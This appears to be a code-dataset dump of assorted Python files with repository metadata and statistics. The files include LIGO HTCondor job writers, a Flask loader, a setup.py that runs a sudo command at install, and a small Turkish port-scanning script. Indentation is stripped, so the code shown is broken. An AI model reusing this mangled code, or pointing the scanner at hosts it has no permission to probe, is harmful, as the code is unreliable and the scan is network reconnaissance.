ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("find") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("ligolw_add") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
| 0
| 0
| 0
| 0
| 0
| 423
| 0
| 0
| 68
|
175a3b4d2739554618c982905727d9731a509a3f
| 934
|
py
|
Python
|
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from flask import Flask
import mysql
from mysql import Pool
import properties
# WEB(jsonascii)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
#
# dir_path,routes,'/routes'
print('')
mysql.pool = Pool.Pool()
# print('')
print('')
for path in properties.blueprint_path:
map_apps(path)
| 22.780488
| 96
| 0.639186
|
# coding: utf-8
from flask import Flask
import mysql,os,re
from mysql import Pool
import properties
# 定义WEB容器(同时防止json以ascii解码返回)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
# 处理各模块中的自动注入以及组装各蓝图
# dir_path中为蓝图模块路径,例如需要引入的蓝图都在routes文件夹中,则传入参数'/routes'
def map_apps(dir_path):
path=os.getcwd()+dir_path
list=os.listdir(path)
print('蓝图文件夹:','.',dir_path)
# list.remove('__pycache__')
while list:
try:
file=list.pop(0)
if file.startswith('__') and file.endswith('__'):
continue
print('加载蓝图模块:',file)
f_model=__import__(re.sub('/','',dir_path)+'.'+re.sub('\.py','',file),fromlist=True)
app.register_blueprint(f_model.app)
except:
pass
def get_app():
return app
print('加载数据库模块')
mysql.pool = Pool.Pool()
# print('加载完毕')
print('蓝图初始化')
for path in properties.blueprint_path:
map_apps(path)
| 258
| 0
| 0
| 0
| 0
| 479
| 0
| 6
| 45
|
84eea4a37f53204b935d3f1eece7e1963b816b5c
| 1,893
|
py
|
Python
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | 1
|
2021-05-20T09:31:26.000Z
|
2021-05-20T09:31:26.000Z
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='[email protected]',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 39.4375
| 159
| 0.692552
|
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
def get_data_files():
data_files = [('/usr/share/sysmontask/glade_files', ['glade_files/disk.glade','glade_files/diskSidepane.glade','glade_files/gpu.glade',
'glade_files/gpuSidepane.glade','glade_files/net.glade','glade_files/netSidepane.glade','glade_files/sysmontask.glade','glade_files/filter_dialog.glade']),
('/usr/share/sysmontask/icons',['icons/SysMonTask.png']),
('/usr/share/doc/sysmontask',['AUTHORS', 'README.md','LICENSE']),
('/usr/share/applications',['SysMonTask.desktop']),
('/usr/share/glib-2.0/schemas',['com.github.camelneeraj.sysmontask.gschema.xml'])
]
return data_files
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='[email protected]',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 0
| 0
| 0
| 0
| 0
| 603
| 0
| 0
| 23
|
210a678a3c714cdead1544323597dcdb1cff8f70
| 323
|
py
|
Python
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 2
|
2021-12-22T07:43:14.000Z
|
2021-12-24T12:07:33.000Z
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | null | null | null |
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 1
|
2021-12-22T07:43:26.000Z
|
2021-12-22T07:43:26.000Z
|
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 24.846154
| 54
| 0.616099
|
def non_start(str1, str2):
if len(str1) >= 1 and len(str2) >= 1:
newstr = str1[1:len(str1)] + str2[1:len(str2)]
return newstr
else:
return False
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 0
| 0
| 0
| 0
| 0
| 155
| 0
| 0
| 22
|
a1b5ff50c9c782fea188c9b6fb9e25d0a0c8232c
| 705
|
py
|
Python
|
port.py
|
hawk-0fcx/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | 1
|
2022-03-12T11:33:16.000Z
|
2022-03-12T11:33:16.000Z
|
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
import socket
import os
os.system("clear")
from colorama import Fore
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "LTFEN P ADRESN GRNZ : ")
port = int(input(Fore.RED + "TARATILACAK PORT ADRESN GRNZ : "))
portScanner(port)
| 26.111111
| 68
| 0.537589
|
import socket
import os
os.system("clear")
import colorama
from colorama import Fore, Back, Style, init
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "LÜTFEN İP ADRESİNİ GİRİNİZ : ")
port = int(input(Fore.RED + "TARATILACAK PORT ADRESİNİ GİRİNİZ : "))
def portScanner(port):
if s.connect_ex((host, port)):
print(Fore.GREEN + "BU PORT KAPALI")
else:
print(Fore.GREEN + "BU PORT AÇIK")
portScanner(port)
| 26
| 0
| 0
| 0
| 0
| 133
| 0
| 13
| 45
|
09bff90f642cffe4743a7a3613eb947ba5cade52
| 156
|
py
|
Python
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 341
|
2018-04-26T08:46:05.000Z
|
2022-03-01T08:13:39.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 24
|
2020-09-30T19:57:14.000Z
|
2021-10-05T07:21:09.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 128
|
2018-05-07T07:30:29.000Z
|
2022-02-19T17:53:39.000Z
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
| 78
| 90
| 0.788462
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
15c549b448318131afb3c0205f8085e21f227080
| 9,494
|
py
|
Python
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 41
|
2015-05-21T21:12:26.000Z
|
2022-02-17T17:23:14.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 63
|
2015-05-15T10:25:55.000Z
|
2021-02-23T04:51:17.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 12
|
2015-06-12T11:52:08.000Z
|
2020-09-23T10:40:59.000Z
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
execute(None,doit, argspec)
| 48.192893
| 123
| 0.425637
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
import os,sys
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
def doit(args) :
global file
action = args.action
params = args.paramsobj
logger=params.logger
varlist = ['url', 'copyright', 'license', 'author', 'version']
copyrightpre = 'Copyright (c) '
copyrightpost = ' SIL International (http://www.sil.org)'
standards = {
'copyright': copyrightpre + cyear + copyrightpost,
'version': params.sets['default']['version'],
'url': 'http://github.com/silnrsi/pysilfont',
'license': 'Released under the MIT License (http://opensource.org/licenses/MIT)'}
pythonfiles = {}
otherfiles = []
for subdir, dirs, files in os.walk("."):
if not (subdir=="." or subdir[0:5] in ("./lib","./scr")) : continue
if subdir[0:] == "./lib/pysilfont.egg-info" : continue
for filen in files:
if filen[-1:]=="~" : continue
if filen[-3:]=="pyc" : continue
if filen in ("__init__.py", "ez_setup.py") : continue
needver = (True if filen in ('setup.py', 'param.py') else False)
fulln = os.path.join(subdir,filen)
file = open(fulln,"r")
line1 = nextline()
pyline1 = (True if line1 in ("#!/usr/bin/env python", "#!/usr/bin/python") else False)
if pyline1 or filen[-3:] == ".py" :
# Look for standard headers
headererror = []
headers = "#!/usr/bin/env python"
if pyline1 :
# Read description which may be single or multiline
line = nextline()
headers = headers + "\n"+line
if line[0:3] == "'''" :
while line[-3:] != "'''" :
line = nextline()
if line =="EOF" : break # Must be EOF
headers = headers + "\n"+line
if line =="EOF" : headererror.append("No closing ''' to description")
elif line[0:1] != "'" : headererror.append("No description")
if headererror :
for line in headererror : logger.log(fulln + ": "+line,"E")
continue
# Read header variables
headvar={}
line = nextline()
while line[0:2] == "__" :
endn = line.find("__ = '")
if endn == -1 : std = headererror.append("Invalid variable line: " + line)
varn = line[2:endn]
val = line[endn+6:-1]
headvar[varn] = val
line = nextline()
# Check header variables
updatevars = {}
reportvars = {}
author = None
for varn in varlist :
if varn in headvar:
headval = headvar[varn]
if varn == 'author' : # Simply use existing author
author = headval
elif varn == "version" and not needver :
updatevars[varn] = "deleted"
elif varn == "copyright" : # Need to check dates and use oldest
# Find existing dates, assuming format 20nn and one or two dates
cdate = cyear
valid = True
datpos = headval.find("20")
if datpos != -1 :
# read any more digits
cdate='20'
nextpos = datpos+2
while headval[nextpos] in '0123456789' and nextpos < len(headval) :
cdate = cdate + headval[nextpos]
nextpos += 1
# Look for second date
rest = headval[nextpos:]
datpos = rest.find("20")
date2 = ""
if datpos != -1 :
date2 = '20'
nextpos = datpos+2
while rest[nextpos] in '0123456789' and nextpos < len(rest) :
date2 = date2 + rest[nextpos]
nextpos += 1
cval=int(cdate)
if cval < 2000 or cval > int(cyear) : valid = False
if date2 != "" :
val2 = int(date2)
if val2 < cval or val2 > int(cyear) : valid = False
if not valid : cdate = cyear
copyright = copyrightpre + cdate + copyrightpost
if headval != copyright :
updatevars[varn] = ("updated" if valid else "update (invalid dates)")
else :
if headval != standards[varn] :
updatevars[varn] = "updated"
else :
if varn == 'author' :
reportvars[varn] = "no author"
elif varn == "version" and not needver :
pass
else:
updatevars[varn] ="added"
for varn in headvar:
if varn not in varlist: reportvars[varn] = "non-standard"
else :
logger.log( fulln + ": " + "No python header - first line is " + line1, "E")
continue
else :
otherfiles.append(fulln)
continue
# Now have python file with no errors, so can update headers
if action == 'update' and updatevars :
logger.log("Updating "+fulln,"P")
outfile = open("update_headers_temp.txt", "w")
outfile.write(headers + "\n")
for varn in varlist :
if varn == "version" and not needver :
pass
elif varn == "author" :
if author : outfile.write("__author__ = '" + author + "'\n")
elif varn == "copyright" :
outfile.write("__copyright__ = '" + copyright + "'\n")
else:
outfile.write("__" + varn + "__ = '" + standards[varn] + "'\n")
if varn in updatevars :
reason = updatevars[varn]
if reason == "no author" :
logger.log("No author header variable ", "I")
else :
logger.log("Header variable " + varn + " " + reason, "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
outfile.write("__" + varn + "__ = '" + headvar[varn] + "'\n")
logger.log("Non-standard header variable " + varn + " retained", "W")
else:
logger.log("No author header variable", "I")
# Write the rest of the file
outfile.write(line + "\n") # last line read checking headers
for line in file: outfile.write(line)
outfile.close()
file.close()
os.rename(fulln, fulln+"~")
os.rename("update_headers_temp.txt",fulln)
else :
for varn in updatevars :
logger.log(fulln + ": Header variable " + varn + " will be " + updatevars[varn], "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
logger.log(fulln + ": Non-standard header variable " + varn + " present", "W")
else:
logger.log(fulln + ": No author header variable", "I")
print "\n"+"Non-python files"+"\n"
for filen in otherfiles:
print filen
return
def nextline() :
global file
line = file.readline()
line = ("EOF" if line == "" else line.strip())
return line
execute(None,doit, argspec)
| 0
| 0
| 0
| 0
| 0
| 8,728
| 0
| -8
| 68
|
83d2715a3c28310e7a615f390760361ca9c50fc6
| 1,976
|
py
|
Python
|
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
import atexit
import logging
logger = logging.getLogger(__name__)
atexit.register(_close_executors)
del _close_executors
| 30.875
| 97
| 0.674089
|
import atexit
import logging
from inspect import isclass
from .common_executors import BaseExecutor
from .externel_executors import ExternalExecutorFabric
from .java import *
from .operations import Operation, Operations
from .python import *
from ..utils import isstring
logger = logging.getLogger(__name__)
class BaseTarget(object):
def __init__(self, executor):
self.executor = executor
class Target(BaseTarget):
_executors_pool = {}
def __init__(self, target, target_name=None, env=None):
"""Factory class for building executors
